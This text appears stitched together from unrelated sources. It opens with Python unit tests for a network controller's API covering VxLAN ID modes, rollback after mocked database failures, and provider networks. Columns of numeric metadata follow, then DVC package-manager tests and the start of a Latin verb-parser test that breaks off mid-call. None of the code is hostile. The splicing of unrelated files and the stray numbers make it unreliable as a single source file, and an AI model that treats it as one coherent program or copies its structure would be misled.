self.api.virtual_network_delete(id=vn1_obj.uuid)
logger.debug('PASS - test_cannot_update_vxlan_id')
def test_update_auto_vxlan_id_with_the_same_value(self):
"""
Test case.
1. Set VxLAN identifier mode to 'automatic'.
2. Create new VirtualNetwork.
3. Set VxLAN identifier mode to 'configured'.
4. Update VirtualNetwork with vxlan network identifier equal to
network id.
"""
gvc_fq_name = ['default-global-system-config',
'default-global-vrouter-config']
vxlan_id_mode = {'auto': 'automatic', 'user': 'configured'}
# Set VxLAN identifier mode to 'automatic'
gvc = self.api.global_vrouter_config_read(fq_name=gvc_fq_name)
gvc.set_vxlan_network_identifier_mode(vxlan_id_mode['auto'])
self.api.global_vrouter_config_update(gvc)
gvc = self.api.global_vrouter_config_read(fq_name=gvc_fq_name)
# verify vxlan id mode has been set
self.assertEqual(gvc.vxlan_network_identifier_mode,
vxlan_id_mode['auto'])
# Create new VirtualNetwork
vn = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn)
vn = self.api.virtual_network_read(fq_name=vn.fq_name)
# verify vn_network_id has been set
vn_network_id = vn.get_virtual_network_network_id()
self.assertTrue(vn_network_id > 0)
# Set VxLAN identifier mode to 'configured' (user defined)
gvc.set_vxlan_network_identifier_mode(vxlan_id_mode['user'])
self.api.global_vrouter_config_update(gvc)
gvc = self.api.global_vrouter_config_read(fq_name=gvc_fq_name)
# verify vxlan id mode has been set
self.assertEqual(gvc.vxlan_network_identifier_mode,
vxlan_id_mode['user'])
# Update VirtualNetwork with vxlan network identifier
# equal to network id
vn_properties = VirtualNetworkType()
vn_properties.set_vxlan_network_identifier(vn_network_id)
vn.set_virtual_network_properties(vn_properties)
self.api.virtual_network_update(vn)
# verify vn_network_id is the same as vxlan_network_id
vn = self.api.virtual_network_read(fq_name=vn.fq_name)
vxlan_id = vn.get_virtual_network_properties() \
.get_vxlan_network_identifier()
self.assertEqual(vn_network_id, vxlan_id)
def test_context_undo_fail_db_create(self):
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_create', stub)]):
self.api.virtual_network_create(vn_obj)
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_context_undo_vxlan_id_fail_db_create(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(6000)
vn_obj.set_virtual_network_properties(vn_obj_properties)
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_create', stub)]):
self.api.virtual_network_create(vn_obj)
# make sure allocation counter stays the same
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_context_undo_fail_db_delete(self):
vn_obj = self.create_virtual_network('vn-l2-%s' % self.id())
vn_ipam_refs = vn_obj.get_network_ipam_refs()
mock_zk = self._api_server._db_conn._zk_db
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_delete', stub)]):
self.api.virtual_network_delete(id=vn_obj.uuid)
# Make sure ipam refs still present (undo action recreated it)
vn_obj = self.api.virtual_network_read(id=vn_obj.uuid)
vn_ipam_refs_after_delete_fail = vn_obj.get_network_ipam_refs()
self.assertEqual(vn_ipam_refs[0]['to'],
vn_ipam_refs_after_delete_fail[0]['to'])
self.assertEqual(vn_ipam_refs[0]['uuid'],
vn_ipam_refs_after_delete_fail[0]['uuid'])
self.assertEqual(vn_ipam_refs[0]['attr'].ipam_subnets[0].subnet_uuid,
vn_ipam_refs_after_delete_fail[0][
'attr'].ipam_subnets[0].subnet_uuid)
# Make sure allocation counter stays the same
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_context_undo_vxlan_id_fail_db_update(self):
# enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
# Create vxlan
vxlan_id = 6000
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(vxlan_id)
vn_obj_properties.set_forwarding_mode('l2_l3')
vn_obj.set_virtual_network_properties(vn_obj_properties)
self.api.virtual_network_create(vn_obj)
vxlan_fqname = mock_zk.get_vn_from_id(vxlan_id)
# Update vxlan id (will fail)
new_vxlan_id = 6005
vn_obj_properties.set_vxlan_network_identifier(new_vxlan_id)
vn_obj.set_virtual_network_properties(vn_obj_properties)
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_update', stub)]):
self.api.virtual_network_update(vn_obj)
# Make sure vxlan_id is still allocated with same name
new_vxlan_fqname = mock_zk.get_vn_from_id(vxlan_id)
self.assertEqual(new_vxlan_fqname, vxlan_fqname)
# Make sure new_vxlan_id is deallocated
update_vxlan_fqname = mock_zk.get_vn_from_id(new_vxlan_id)
self.assertEqual(update_vxlan_fqname, None)
# Make sure allocation counter stays the same
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_context_undo_vn_to_vxlan_id_fail_db_update(self):
# Enable vxlan routing on project
proj = self._vnc_lib.project_read(
fq_name=["default-domain", "default-project"])
proj.set_vxlan_routing(True)
self._vnc_lib.project_update(proj)
mock_zk = self._api_server._db_conn._zk_db
vn_obj = VirtualNetwork('%s-vn' % self.id())
self.api.virtual_network_create(vn_obj)
vn_fqname = mock_zk.get_vn_from_id(vn_obj.virtual_network_network_id)
vn_id = vn_obj.virtual_network_network_id
# Change vn to vxlan type
vxlan_id = 6000
vn_obj_properties = VirtualNetworkType(forwarding_mode='l3')
vn_obj_properties.set_vxlan_network_identifier(vxlan_id)
vn_obj_properties.set_forwarding_mode('l2_l3')
vn_obj.set_virtual_network_properties(vn_obj_properties)
def stub(*args, **kwargs):
return (False, (500, "Fake error"))
zk_alloc_count_start = mock_zk._vn_id_allocator.get_alloc_count()
with ExpectedException(HttpError):
with test_common.flexmocks(
[(self._api_server._db_conn, 'dbe_update', stub)]):
self.api.virtual_network_update(vn_obj)
# Make sure vxlan_id was dealocated
new_vxlan_fqname = mock_zk.get_vn_from_id(vxlan_id)
self.assertEqual(new_vxlan_fqname, None)
# Make sure vn id is the same
new_vn_id = vn_obj.virtual_network_network_id
self.assertEqual(vn_id, new_vn_id)
# Make sure fqname is the same fot vn_id
update_vn_fqname = mock_zk.get_vn_from_id(
vn_obj.virtual_network_network_id)
self.assertEqual(vn_fqname, update_vn_fqname)
# Make sure allocation counter stays the same
zk_alloc_count_current = mock_zk._vn_id_allocator.get_alloc_count()
self.assertEqual(zk_alloc_count_start, zk_alloc_count_current)
def test_create_provider_vn(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100,
"physical_network": "physnet1"}))
vn_uuid = self.api.virtual_network_create(vn)
is_provider_network = (self
.api.virtual_network_read(id=vn_uuid)
.get_is_provider_network())
self.assertTrue(is_provider_network)
# end test_create_provider_vn
def test_create_provider_vn_without_provider_details(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn.set_is_provider_network(True)
vn_uuid = self.api.virtual_network_create(vn)
is_provider_network = (self
.api.virtual_network_read(id=vn_uuid)
.get_is_provider_network())
self.assertTrue(is_provider_network)
# end test_create_provider_vn_without_provider_details
def test_update_not_in_use_non_provider_vn_to_provider(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vn = self.api.virtual_network_read(id=vn_uuid)
is_provider_network = vn.get_is_provider_network()
self.assertFalse(is_provider_network)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100,
"physical_network": "physnet1"}))
self.api.virtual_network_update(vn)
vn = self.api.virtual_network_read(id=vn_uuid)
is_provider_network = vn.get_is_provider_network()
self.assertTrue(is_provider_network)
updated_provider_properties = vn.get_provider_properties()
segmentation_id = updated_provider_properties.get_segmentation_id()
physical_network = updated_provider_properties.get_physical_network()
self.assertEqual((100, "physnet1"),
(segmentation_id, physical_network))
# end test_update_non_provider_vn_to_provider
def test_update_non_provider_vn_to_provider_without_provider_details(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vn = self.api.virtual_network_read(id=vn_uuid)
is_provider_network = vn.get_is_provider_network()
self.assertFalse(is_provider_network)
vn.set_is_provider_network(True)
self.api.virtual_network_update(vn)
vn = self.api.virtual_network_read(id=vn_uuid)
is_provider_network = vn.get_is_provider_network()
self.assertTrue(is_provider_network)
# end test_update_non_provider_vn_to_provider_without_provider_details
def test_update_in_use_vn_to_provider_vn(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vmi = VirtualMachineInterface('%s-vmi' % self.id(), parent_obj=project)
vmi.set_virtual_network(vn)
self.api.virtual_machine_interface_create(vmi)
vn = self.api.virtual_network_read(id=vn_uuid)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100,
"physical_network": "physnet1"}))
self.api.virtual_network_update(vn)
updated_provider_properties = (self
.api.virtual_network_read(id=vn.uuid)
.get_provider_properties())
segmentation_id = updated_provider_properties.get_segmentation_id()
physical_network = updated_provider_properties.get_physical_network()
self.assertEqual((100, "physnet1"),
(segmentation_id, physical_network))
# end test_update_in_use_vn_to_provider_vn
def test_update_in_use_vn_to_provider_vn_without_physnet_label(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vmi = VirtualMachineInterface('%s-vmi' % self.id(), parent_obj=project)
vmi.set_virtual_network(vn)
self.api.virtual_machine_interface_create(vmi)
vn = self.api.virtual_network_read(id=vn_uuid)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100}))
with ExpectedException(RefsExistError):
self.api.virtual_network_update(vn)
updated_provider_properties = (self
.api.virtual_network_read(id=vn.uuid)
.get_provider_properties())
self.assertEqual(None, updated_provider_properties)
# end test_update_in_use_vn_to_provider_vn_without_physnet_label
def test_update_in_use_vn_to_provider_vn_without_segmentation(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn_uuid = self.api.virtual_network_create(vn)
vmi = VirtualMachineInterface('%s-vmi' % self.id(), parent_obj=project)
vmi.set_virtual_network(vn)
self.api.virtual_machine_interface_create(vmi)
vn = self.api.virtual_network_read(id=vn_uuid)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"physical_network": "physnet1"}))
with ExpectedException(RefsExistError):
self.api.virtual_network_update(vn)
updated_provider_properties = (self
.api.virtual_network_read(id=vn.uuid)
.get_provider_properties())
self.assertEqual(None, updated_provider_properties)
# end test_update_in_use_vn_to_provider_vn_without_segmentation
def test_update_in_use_provider_vn(self):
project = Project('%s-project' % self.id())
project_uuid = self.api.project_create(project)
project = self.api.project_read(id=project_uuid)
vn = VirtualNetwork('%s-vn' % self.id(), parent_obj=project)
vn.set_is_provider_network(True)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 100,
"physical_network": "physnet1"}))
vn_uuid = self.api.virtual_network_create(vn)
vmi = VirtualMachineInterface('%s-vmi' % self.id(), parent_obj=project)
vmi.set_virtual_network(vn)
self.api.virtual_machine_interface_create(vmi)
vn = self.api.virtual_network_read(id=vn_uuid)
vn.set_provider_properties(
ProviderDetails(
params_dict={"segmentation_id": 200,
"physical_network": "physnet2"}))
with ExpectedException(RefsExistError):
self.api.virtual_network_update(vn)
updated_provider_properties = (self
.api.virtual_network_read(id=vn.uuid)
.get_provider_properties())
segmentation_id = updated_provider_properties.get_segmentation_id()
physical_network = updated_provider_properties.get_physical_network()
self.assertEqual((100, "physnet1"),
(segmentation_id, physical_network))
# end test_update_in_use_provider_vn
| 42.903138
| 79
| 0.682651
| 4,119
| 31,448
| 4.792425
| 0.058752
| 0.032168
| 0.058156
| 0.082979
| 0.888095
| 0.860436
| 0.8269
| 0.800709
| 0.790172
| 0.774012
| 0
| 0.00951
| 0.230953
| 31,448
| 732
| 80
| 42.961749
| 0.806698
| 0.074917
| 0
| 0.726054
| 0
| 0
| 0.047484
| 0.005487
| 0
| 0
| 0
| 0.001366
| 0.088123
| 1
| 0.065134
| false
| 0.009579
| 0.032567
| 0.011494
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5a49e16c79e7766c893de993c2b4108841560d63
| 4,824
|
py
|
Python
|
tests/func/test_pkg.py
|
amisev/dvc
|
025de9aeb509a539d5560f82caf47e851162f4a2
|
[
"Apache-2.0"
] | null | null | null |
tests/func/test_pkg.py
|
amisev/dvc
|
025de9aeb509a539d5560f82caf47e851162f4a2
|
[
"Apache-2.0"
] | null | null | null |
tests/func/test_pkg.py
|
amisev/dvc
|
025de9aeb509a539d5560f82caf47e851162f4a2
|
[
"Apache-2.0"
] | null | null | null |
import os
import git
import filecmp
from dvc.pkg import PkgManager
from tests.utils import trees_equal
def test_install_and_uninstall(repo_dir, dvc_repo, pkg):
    """Install is idempotent and uninstall tolerates a missing package.

    Installs the same pkg twice (second call must not fail or corrupt the
    clone), then uninstalls it twice (second call must be a no-op).
    """
    name = os.path.basename(pkg.root_dir)
    pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
    mypkg_dir = os.path.join(pkg_dir, name)

    def assert_installed():
        # The pkg root and the package checkout must be real directories
        # and the checkout must contain a git clone.
        assert os.path.exists(pkg_dir)
        assert os.path.isdir(pkg_dir)
        assert os.path.exists(mypkg_dir)
        assert os.path.isdir(mypkg_dir)
        assert os.path.isdir(os.path.join(mypkg_dir, ".git"))

    dvc_repo.pkg.install(pkg.root_dir)
    assert_installed()

    # Re-installing the same package must leave everything intact.
    dvc_repo.pkg.install(pkg.root_dir)
    assert_installed()

    # Default install checks out master.
    git_repo = git.Repo(mypkg_dir)
    assert git_repo.active_branch.name == "master"

    dvc_repo.pkg.uninstall(name)
    assert not os.path.exists(mypkg_dir)

    # Uninstalling an already-removed package is a no-op, not an error.
    dvc_repo.pkg.uninstall(name)
    assert not os.path.exists(mypkg_dir)
def test_uninstall_corrupted(repo_dir, dvc_repo):
    """Uninstall must remove a package dir even when it is not a git clone."""
    # Original called os.path.basename("mypkg"), which is a no-op on a
    # bare name — the literal is used directly instead.
    name = "mypkg"
    pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
    mypkg_dir = os.path.join(pkg_dir, name)
    # Simulate a corrupted install: an empty directory without a .git inside.
    os.makedirs(mypkg_dir)
    dvc_repo.pkg.uninstall(name)
    assert not os.path.exists(mypkg_dir)
def test_force_install(repo_dir, dvc_repo, pkg):
    """Plain install into an existing dir is a no-op; force=True overwrites."""
    pkg_name = os.path.basename(pkg.root_dir)
    packages_root = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
    target = os.path.join(packages_root, pkg_name)
    os.makedirs(target)

    # Without force, the pre-existing (empty) directory is left untouched.
    dvc_repo.pkg.install(pkg.root_dir)
    assert not os.listdir(target)

    # With force, the package is actually cloned into place.
    dvc_repo.pkg.install(pkg.root_dir, force=True)
    for path in (packages_root, target):
        assert os.path.exists(path)
        assert os.path.isdir(path)
    assert os.path.isdir(os.path.join(target, ".git"))
def test_install_version(repo_dir, dvc_repo, pkg):
    """Installing with an explicit version checks out that branch."""
    pkg_name = os.path.basename(pkg.root_dir)
    packages_root = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
    target = os.path.join(packages_root, pkg_name)

    dvc_repo.pkg.install(pkg.root_dir, version="branch")

    for path in (packages_root, target):
        assert os.path.exists(path)
        assert os.path.isdir(path)
    assert os.path.isdir(os.path.join(target, ".git"))
    # The clone must have the requested branch checked out.
    assert git.Repo(target).active_branch.name == "branch"
def test_import(repo_dir, dvc_repo, pkg):
    """Importing a file from an installed package copies it verbatim."""
    pkg_name = os.path.basename(pkg.root_dir)
    source = pkg.FOO
    destination = pkg.FOO + "_imported"

    dvc_repo.pkg.install(pkg.root_dir)
    dvc_repo.pkg.imp(pkg_name, source, destination)

    assert os.path.exists(destination)
    assert os.path.isfile(destination)
    # Byte-for-byte comparison against the repo's own copy of the file.
    assert filecmp.cmp(repo_dir.FOO, destination, shallow=False)
def test_import_dir(repo_dir, dvc_repo, pkg):
    """Importing a directory from an installed package copies the whole tree."""
    pkg_name = os.path.basename(pkg.root_dir)
    source = pkg.DATA_DIR
    destination = pkg.DATA_DIR + "_imported"

    dvc_repo.pkg.install(pkg.root_dir)
    dvc_repo.pkg.imp(pkg_name, source, destination)

    assert os.path.exists(destination)
    assert os.path.isdir(destination)
    # Directory trees must match file-by-file.
    trees_equal(source, destination)
def test_import_url(repo_dir, dvc_repo, pkg):
    """imp() with a URL installs the package on the fly, then imports the file."""
    pkg_name = os.path.basename(pkg.root_dir)
    packages_root = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
    target_pkg = os.path.join(packages_root, pkg_name)
    source = pkg.FOO
    destination = pkg.FOO + "_imported"

    # No explicit install(): passing the URL triggers an implicit install.
    dvc_repo.pkg.imp(pkg.root_dir, source, destination)

    for path in (packages_root, target_pkg):
        assert os.path.exists(path)
        assert os.path.isdir(path)
    assert os.path.isdir(os.path.join(target_pkg, ".git"))

    assert os.path.exists(destination)
    assert os.path.isfile(destination)
    assert filecmp.cmp(repo_dir.FOO, destination, shallow=False)
def test_import_url_version(repo_dir, dvc_repo, pkg):
    """imp() with a version imports the file as it exists on that branch."""
    name = os.path.basename(pkg.root_dir)
    pkg_dir = os.path.join(repo_dir.root_dir, ".dvc", "pkg")
    mypkg_dir = os.path.join(pkg_dir, name)
    src = "version"
    dst = src

    dvc_repo.pkg.imp(pkg.root_dir, src, dst, version="branch")

    assert os.path.exists(pkg_dir)
    assert os.path.isdir(pkg_dir)
    assert os.path.exists(mypkg_dir)
    assert os.path.isdir(mypkg_dir)
    assert os.path.isdir(os.path.join(mypkg_dir, ".git"))
    assert os.path.exists(dst)
    assert os.path.isfile(dst)
    # Fixed: the file is only read here, so open read-only — the original
    # "r+" mode requested write access it never used.
    with open(dst, "r") as fobj:
        assert fobj.read() == "branch"
def test_get_file(repo_dir, dvc_repo, pkg):
    """PkgManager.get copies a single file out of a package directly."""
    source = pkg.FOO
    destination = pkg.FOO + "_imported"

    PkgManager.get(pkg.root_dir, source, destination)

    assert os.path.exists(destination)
    assert os.path.isfile(destination)
    assert filecmp.cmp(repo_dir.FOO, destination, shallow=False)
def test_get_dir(repo_dir, dvc_repo, pkg):
    """PkgManager.get copies a whole directory out of a package directly."""
    source = pkg.DATA_DIR
    destination = pkg.DATA_DIR + "_imported"

    PkgManager.get(pkg.root_dir, source, destination)

    assert os.path.exists(destination)
    assert os.path.isdir(destination)
    trees_equal(source, destination)
| 27.565714
| 62
| 0.692993
| 804
| 4,824
| 3.956468
| 0.070896
| 0.13392
| 0.158441
| 0.122603
| 0.897517
| 0.897517
| 0.89563
| 0.879283
| 0.877397
| 0.8315
| 0
| 0
| 0.173093
| 4,824
| 174
| 63
| 27.724138
| 0.797443
| 0
| 0
| 0.778689
| 0
| 0
| 0.032131
| 0
| 0
| 0
| 0
| 0
| 0.42623
| 1
| 0.081967
| false
| 0
| 0.114754
| 0
| 0.196721
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5a69bc34e6d7a55844c7d9ffc3db6aae966673bd
| 161
|
py
|
Python
|
lasier/adapters/caches/__init__.py
|
luizalabs/lasier
|
edb0e850cb630fb55ce83c255bbb1e7fca08b21f
|
[
"MIT"
] | 61
|
2019-12-13T20:08:30.000Z
|
2022-03-22T11:51:04.000Z
|
lasier/adapters/caches/__init__.py
|
jairhenrique/lasier
|
29bf96cb888493d369a22400bec6acffe345d168
|
[
"MIT"
] | 25
|
2019-12-13T17:14:46.000Z
|
2022-03-17T18:49:34.000Z
|
lasier/adapters/caches/__init__.py
|
jairhenrique/lasier
|
29bf96cb888493d369a22400bec6acffe345d168
|
[
"MIT"
] | 6
|
2020-04-02T21:10:08.000Z
|
2022-03-17T15:31:15.000Z
|
from .aiocache import Adapter as AiocacheAdapter # noqa
from .django import Adapter as DjangoAdapter # noqa
from .redis import Adapter as RedisAdapter # noqa
| 40.25
| 56
| 0.795031
| 21
| 161
| 6.095238
| 0.52381
| 0.304688
| 0.351563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.167702
| 161
| 3
| 57
| 53.666667
| 0.955224
| 0.086957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ce56027bba1dafd0566245479a05ec73c1dc496b
| 2,603
|
py
|
Python
|
ValAgents.py
|
Mister-SOSA/ValAgents
|
06fcc47c24dc1ded6b8d79710f485c24d726ca76
|
[
"MIT"
] | null | null | null |
ValAgents.py
|
Mister-SOSA/ValAgents
|
06fcc47c24dc1ded6b8d79710f485c24d726ca76
|
[
"MIT"
] | null | null | null |
ValAgents.py
|
Mister-SOSA/ValAgents
|
06fcc47c24dc1ded6b8d79710f485c24d726ca76
|
[
"MIT"
] | null | null | null |
""" Dictionaries of all VALORANT agents with their respective UUIDs, categorized by role. """
list_all_agents = {
"Jett" : "add6443a-41bd-e414-f6ad-e58d267f4e95",
"Reyna" : "a3bfb853-43b2-7238-a4f1-ad90e9e46bcc",
"Raze" : "f94c3b30-42be-e959-889c-5aa313dba261",
"Yoru" : "7f94d92c-4234-0a36-9646-3a87eb8b5c89",
"Phoenix" : "eb93336a-449b-9c1b-0a54-a891f7921d69",
"Neon" : "bb2a4828-46eb-8cd1-e765-15848195d751",
"Breach" : "5f8d3a7f-467b-97f3-062c-13acf203c006",
"Skye" : "6f2a04ca-43e0-be17-7f36-b3908627744d",
"Sova" : "320b2a48-4d9b-a075-30f1-1f93a9b638fa",
"KAY/O" : "601dbbe7-43ce-be57-2a40-4abd24953621",
"Killjoy" : "1e58de9c-4950-5125-93e9-a0aee9f98746",
"Cypher" : "117ed9e3-49f3-6512-3ccf-0cada7e3823b",
"Sage" : "569fdd95-4d10-43ab-ca70-79becc718b46",
"Chamber" : "22697a3d-45bf-8dd7-4fec-84a9e28c69d7",
"Omen" : "8e253930-4c05-31dd-1b6c-968525494517",
"Brimstone" : "9f0d8ba9-4140-b941-57d3-a7ad57c6b417",
"Astra" : "41fb69c1-4189-7b37-f117-bcaf1e96f1bf",
"Viper" : "707eab51-4836-f488-046a-cda6bf494859"
}
list_deulists = {
"Jett" : "add6443a-41bd-e414-f6ad-e58d267f4e95",
"Reyna" : "a3bfb853-43b2-7238-a4f1-ad90e9e46bcc",
"Raze" : "f94c3b30-42be-e959-889c-5aa313dba261",
"Yoru" : "7f94d92c-4234-0a36-9646-3a87eb8b5c89",
"Phoenix" : "eb93336a-449b-9c1b-0a54-a891f7921d69",
"Neon" : "bb2a4828-46eb-8cd1-e765-15848195d751"
}
list_initiators = {
"Breach" : "5f8d3a7f-467b-97f3-062c-13acf203c006",
"Skye" : "6f2a04ca-43e0-be17-7f36-b3908627744d",
"Sova" : "320b2a48-4d9b-a075-30f1-1f93a9b638fa",
"KAY/O" : "601dbbe7-43ce-be57-2a40-4abd24953621"
}
list_sentinels = {
"Killjoy" : "1e58de9c-4950-5125-93e9-a0aee9f98746",
"Cypher" : "117ed9e3-49f3-6512-3ccf-0cada7e3823b",
"Sage" : "569fdd95-4d10-43ab-ca70-79becc718b46",
"Chamber" : "22697a3d-45bf-8dd7-4fec-84a9e28c69d7"
}
list_controllers = {
"Omen" : "8e253930-4c05-31dd-1b6c-968525494517",
"Brimstone" : "9f0d8ba9-4140-b941-57d3-a7ad57c6b417",
"Astra" : "41fb69c1-4189-7b37-f117-bcaf1e96f1bf",
"Viper" : "707eab51-4836-f488-046a-cda6bf494859"
}
def deulists():
return list_deulists
def initiators():
return list_initiators
def sentinels():
return list_sentinels
def controllers():
return list_controllers
def returnAgents(role):
if (role == 'deulists'):
return list_deulists
if (role == 'initiators'):
return list_initiators
if (role == 'sentinels'):
return list_sentinels
if (role == 'controllers'):
return list_controllers
| 34.706667
| 93
| 0.683058
| 288
| 2,603
| 6.125
| 0.451389
| 0.045351
| 0.018141
| 0.022676
| 0.758503
| 0.758503
| 0.758503
| 0.758503
| 0.758503
| 0.758503
| 0
| 0.340754
| 0.154437
| 2,603
| 74
| 94
| 35.175676
| 0.4607
| 0.032655
| 0
| 0.603175
| 0
| 0
| 0.606375
| 0.516335
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079365
| false
| 0
| 0
| 0.063492
| 0.206349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce805bf1b4c52a5e9fb1250d1cb0b232e3484b16
| 9,126
|
py
|
Python
|
tests/integration/Test_Verbs.py
|
Drewlark/whitakers_words
|
c0bf18d06215eb1e585413e5d426c9426b30c85a
|
[
"MIT"
] | null | null | null |
tests/integration/Test_Verbs.py
|
Drewlark/whitakers_words
|
c0bf18d06215eb1e585413e5d426c9426b30c85a
|
[
"MIT"
] | null | null | null |
tests/integration/Test_Verbs.py
|
Drewlark/whitakers_words
|
c0bf18d06215eb1e585413e5d426c9426b30c85a
|
[
"MIT"
] | null | null | null |
import unittest
from whitakers_words.enums import Mood, Number, Person, Tense, Voice, WordType
from whitakers_words.parser import Parser
class VerbTest(unittest.TestCase):
    """Integration tests: parse inflected Latin verb forms end-to-end.

    Seven of the original tests repeated an identical 13-line assertion
    body differing only in data; that body is factored into
    _check_single_inflection. test_venit keeps its bespoke logic because
    the word is ambiguous between two lexemes.
    """

    @classmethod
    def setUpClass(cls):
        # One shared Parser for the whole class — constructing it per test
        # would repeat the dictionary loading for every case.
        cls.par = Parser()

    def _check_single_inflection(self, word, root, stem, affix, features,
                                 analyses=1):
        """Parse *word* and assert a verb analysis with one inflection.

        Every analysis must come from lexeme *root*, be a verb, and carry
        exactly one inflection equal to *stem* + *affix* with exactly
        *features*. *analyses* is the expected number of analyses for the
        single returned form.
        """
        result = self.par.parse(word)
        self.assertEqual(len(result.forms), 1)
        self.assertEqual(len(result.forms[0].analyses), analyses)
        for analysis in result.forms[0].analyses.values():
            self.assertEqual(analysis.lexeme.roots[0], root)
            self.assertEqual(analysis.lexeme.wordType, WordType.V)
            self.assertEqual(len(analysis.inflections), 1)
            inflection = analysis.inflections[0]
            self.assertEqual(inflection.stem, stem)
            self.assertEqual(inflection.affix, affix)
            self.assertEqual(inflection.wordType, WordType.V)
            self.assertEqual(inflection.features, features)

    def test_amat(self):
        self._check_single_inflection(
